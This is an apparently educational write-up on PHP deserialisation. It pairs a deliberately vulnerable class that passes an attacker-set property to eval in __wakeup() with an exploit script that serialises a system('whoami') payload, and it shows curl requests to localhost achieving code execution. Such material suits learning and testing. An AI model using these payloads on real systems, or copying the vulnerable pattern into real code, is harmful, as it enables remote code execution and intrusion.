PHP deserialisation
First of all, let's explain what serialisation and deserialisation mean. The serialisation of an object transforms an object from Object Programming languages such as Java, Python or PHP into a format that can be stored or transferred. Deserailsation turns serialised objects from files or the network into ordinary programming objects.
An attacker could manipulate serialised objects to change the application's logic, perform a denial service, or execute arbitrary code when deserialised.
When you control a serialised object that is passed into unserialised(), you can control the properties of the created object. You might also be able to hijack the flow of the application by controlling the values passed into automatically executed methods like __wakeup(), or __destruct().
In this Proof of concept, the vulnerable code receives a serialised object through the GET parameter
r
, then unserialises it into an array, printing the first two values. However, an attacker could create its own inject
variable, which value will be executed by the function eval
just after the unserialize
function was performed due to the function __ wakeup()
.Vulnerable code:
<?php
class PHPObjectInjection{
public $inject;
function __construct(){
}
function __wakeup(){
if(isset($this->inject)){
eval($this->inject);
}
}
}
if(isset($_REQUEST['r'])){
$var1=unserialize($_REQUEST['r']);
if(is_array($var1)){
echo "<br/>".$var1[0]." - ".$var1[1];
}
}
else{
echo ""; # nothing happens here
}
?>
php -S localhost:8080 vuln.php
Exploit :
<?php
class PHPObjectInjection{
public $inject = "system('whoami');";
}
echo urlencode(serialize(array("vul","nerable"))); # Basic serialized data
echo "\n";
echo urlencode(serialize(new PHPObjectInjection)); # Command execution (__wakeup)
?>
php exploit.php
# Intended use
a%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22vul%22%3Bi%3A1%3Bs%3A7%3A%22nerable%22%3B%7D
# Malicious use
O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D
Result:
As you can see below, because the attacker could replace the
$inject
variable with the command "whoami", the attacker gained RCE knowing the user who executed the PHP service.curl http://localhost:8080?r=a%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22vul%22%3Bi%3A1%3Bs%3A7%3A%22nerable%22%3B%7D
vul - nerable
curl http://localhost:8080?r=O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D
kali
Last modified 13d ago